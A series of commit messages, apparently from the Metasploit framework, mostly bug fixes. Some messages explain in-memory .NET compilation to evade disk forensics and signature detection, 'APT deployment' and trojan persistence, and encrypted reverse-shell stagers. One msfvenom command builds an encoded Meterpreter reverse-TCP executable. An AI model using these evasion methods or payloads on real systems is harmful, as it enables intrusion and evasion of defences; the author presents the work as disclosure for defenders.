MS-2073
* imports are slow mainly caused by fingerprinting after every service creation
* now only fingerprints after all the services are created for imports
cmd_psh_payload relies on datastore options to have a proper
data type down the call chain. When modules are created with string
values for all data store options, a conditional naively checking
what should be a boolean value for false/nil? would return true
for a string representation of "false."
Ensure that datastore options are validated prior to using them
to set variables passed into Rex methods.
Allow passing exec_in_place parameter to cmd_psh_payload in order
to execute raw powershell without the commandline wrappers of
comspec or calling the powershell binary itself.
This is useful in contexts such as the web delivery mechanism or
recent powershell sessions as it does not require the creation of
a new PSH instance.
Add Exploit::Powershell::DotNet namespace with compiler and
runtime elevator.
Add compiler modules for payloads and custom .NET code/blocks.
==============
Powershell-based persistence module to compile .NET templates
with MSF payloads into binaries which persist on host.
Templates by @hostess (way back in 2012).
C# templates for simple binaries and a service executable with
its own install wrapper.
==============
Generic .NET compiler post module
Compiles .NET source code to binary on compromised hosts.
Useful for home-grown APT deployment, decoy creation, and other
misdirection or collection activities.
Using mimikatz (kiwi), one can also extract host-resident certs
and use them to sign the generated binary, thus creating a
locally trusted exe which helps with certain defensive measures.
==============
Concept:
Microsoft has graciously included a compiler in every modern
version of Windows. Although executables which can be easily
invoked by the user may not be present on all hosts, the
shared runtime of .NET and Powershell exposes this functionality
to all users with access to Powershell.
This commit provides a way to execute the compiler entirely in
memory, seeking to avoid disk access and the associated forensic
and defensive measures. Resulting .NET assemblies can be run
from memory, or written to disk (with the option of signing
them using a pfx cert on the host). Two basic modules are
provided to showcase the functionality and execution pipeline.
Usage notes:
Binaries generated this way are dynamic by nature and avoid sig
based detection. Heuristics, sandboxing, and other isolation
mechanisms must be defeated by the user for now. Play with
compiler options, included libraries, and runtime environments
for maximum entropy before you hit the temmplates.
Defenders should watch for:
Using this in conjunction with WMI/PS remoting or other MSFT
native distributed execution mechanism can bring malware labs
to their knees with properly crafted templates.
The powershell code to generate the binaries also provides a
convenient method to leave behind complex trojans which are not
yet in binary form, nor will they be until execution (which can
occur strictly in memory avoiding disk access for the final
product).
==============
On responsible disclosure: I've received some heat over the years
for prior work in this arena. Everything here is already public,
and has been in closed PRs in the R7 repo for years. The bad guys
have had this for a while (they do their homework religiously),
defenders need to be made aware of this approach and prepare
themselves to deal with it.
Differences in transport configuration and the actual payload do
not allow a direct splice of the original files included.
Clean up the payload generator to work with upstream handler,
payload, and transport configuration implementation.
Initial testing shows inbound sessions are created and SSL cert
is now properly attaching to the handler.
Running zipalign on an APK after signing and before distribution
is considered general best practice. Also, properly aligning an APK
makes it less likely to be flagged as suspicious by mobile security
solutions.
More on zipalign from Google:
https://developer.android.com/studio/command-line/zipalign.html
In BrowserAutoPwn2, the mixin forgets to pass the SRVPORT datastore
option to the exploits, so they always use the default 8080. As a
result, if a different SRVPORT is set, BAP2 would be serving the
target machine with bad exploit links.
Fix#7021
Users reported (in GitHub issue #7008) hitting an exception when attempting to export the contents of the msf database (i.e. workspaces, hosts, events, etc.) via the 'db_export' command. After some digging, it appears there were a few ActiveRecord changes with the new Rails upgrade that require a couple mods to the way we are querying.
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention
MS-1688
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
Currently any existing and future JCL payload has to have a 'job card'
basically data that defines the job to z/OS. It has information about
the job's owner, place it will run, output creation, etc. All JCL
shares the same job card format. As such, creating a shared payload
method that allows this text to be imported into any JCL payload.
Additionally, that job card is now parameterized, allowing the
exploit/payload user to edit these job card values-as this may be needed
in order to run the job sucessfully on any given system.
This PR sets up the mf module - next PRs will update the existing
payloads to use this module.
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
Fix#4885
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.
Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Misc:
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.
Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenince methods for standard payload generation.
Testing:
Tested against Win2k8r2, Win7x64, and WinXPx86
ToDo:
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which i do not yet fully
understand, are appropriate and do not introduce breakage.
this method was absed around a char limit
for the desc column which no longer exists
trying to perform this operation generates an error
removing the method since it is not needed
This patch fixes two problems:
1. 6820 - If the HTTP server returns a relative path
(example: /test), there is no host to extract, therefore the HOST
header in the HTTP request ends up being empty. When the web
server sees this, it might return an HTTP 400 Bad Request, and
the redirection fails.
2. 6806 - If the HTTP server returns a relative path that begins
with a dot, send_request_cgi! will literally send that in the
GET request. Since that isn't a valid GET request path format,
the redirection fails.
Fix#6806Fix#6820
reimplement HD's work on a session interrupt handler
so that if an exploit fails the handler does not continue
waiting for a session that will never come
MS-385
Before, the datastore would store options case-sensitive, but would
access them case-insensitive, resulting is a number of string compares.
This commit stores options in their downcase form to reduce
update/lookup time. This adds up to reducing msfconsole boot time by
about 10% and rspec time by about 45 sec. (!) on my box.
One tricky part of this conversion is that there are several places (in
pro and framework) where we export or otherwise access the datastore as
a plain hash (case-sensitive). I believe I have caught all the ways we
access the datastore that are case-sensitive and substituted the
original key capitalization in those cases.
file:/ strings are special with some datastore options, causing them to read a
file rather than emitting the exact string. This causes a couple of problems.
1. the valid? check needs to be special on assignment, since normalization
really means normalizing the path, not playing with the value as we would do
for other types
2. there are races or simply out-of-order assignments when running commands
like 'services -p 80 -R', where the datastore option is assigned before the
file is actually written.
This is the 'easy' fix of disabling assignment validation (which we didn't have
before anyway) for types that can expect a file:/ prefix.
Options without a default were not pulled into the `@options` hash and
therefore were not used to validate options on assignment.
I am not entirely sure how this fix works, since it would seem that
non-override options would not get pulled in if an option was first set
in the global datastore. However, a previous value does not get
overridden and new values are validated. Anything further is merely
speculation on my part.
the preauth fingerprinting for postgres is somewhat
unmaintainable, but due to a specific customer request
i have added these two FPs for 9.4.1-5
MS-1102
Exploit::Remote::HttpServer and every descendant utilizes the
print_prefix method which checks whether the module which mixes in
these modules is aggressive. This is done in a proc context most
of the time since its a callback on the underlying Rex HTTP server.
When modules do not define :aggressive? the resulting exceptions
are quietly swallowed, and requestors get an empty response as the
client object dies off.
Add check for response to :aggressive? in :print_prefix to address
this issue.
This pops up occasionally. This fixes a couple of anecdotal reports of missing
requires that cause the loader to fail, depending on the directory sort order.
It also fixes the problem as reported in #6460
Fix#6445
Problem:
When an HttpServer instance is trying to register a resource that
is already taken, it causes all HttpServers to terminate, which
is not a desired behavior.
Root Cause:
It appears the Msf::Exploit::Remote::TcpServer#stop_service method
is causing the problem. When the service is being detected as an
HttpServer, the #stop method used actually causes all servers to
stop, not just for a specific one. This stopping route was
introduced in 04772c8946, when Juan
noticed that the java_rmi_server exploit could not be run again
after the first time.
Solution:
Special case the stopping routine on the module's level, and not
universal.
def peer is a method that gets repeated a lot in modules, so we
should have it in the tcp mixin. This commit also clears a few
modules that use the HttpClient mixin with def peer.
Fix#6371
When a browser fails to bind (probably due to an invalid port or
server IP), the module actually fails to report this exception from
exception, the method calls exploit.handle_exception(e). But since
handle_exception is not a valid method for that object, it is unable
to do so, and as a result the module fails to properly terminate
the module, or show any error on the console. For the user, this will
make it look like the module has started, the payload listener is up,
but there is no exploit job.
Rex::BindFailed actually isn't the only error that could be raised
by #job_run_proc. As far as I can tell registering the same resource
again could, too. With this patch, the user should be able to see this
error too.
Since the exploit object does not have access to the methods in
Msf::Simple::Exploit, plus there is no other code using
handle_exception and setup_fail_detail_from_exception, I decided
to move these to lib/msf/core/exploit.rb so they are actually
callable.
Most exploits don't check nil for generate_payload_exe, they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
Platform can be seen from different sources:
1. From the opts argument. For example: When you are using
generate_payload_exe, and you want to set a specific platform.
This is the most explicit. So we check first.
2. From the metadata of a payload module. Normally, a payload module
should include the platform information, with the exception of
some generic payloads. For example: generic/shell_reverse_tcp.
This is the most trusted source.
3. From the exploit module's target.
4. From the exploit module's metadata.
Architecture shares the same load order.
We haven't been able to get the XML data that would cause the error, all we have is a backtrace. So "verification" is purely code reading. Thanks @wchen-r7
Fixes#6085
Merge remote-tracking branch 'origin/pr/6259'
Running a local exploit like a post is not currently supported,
we should at least raise a warning or something, and not just
let it backtrace and confuse the user.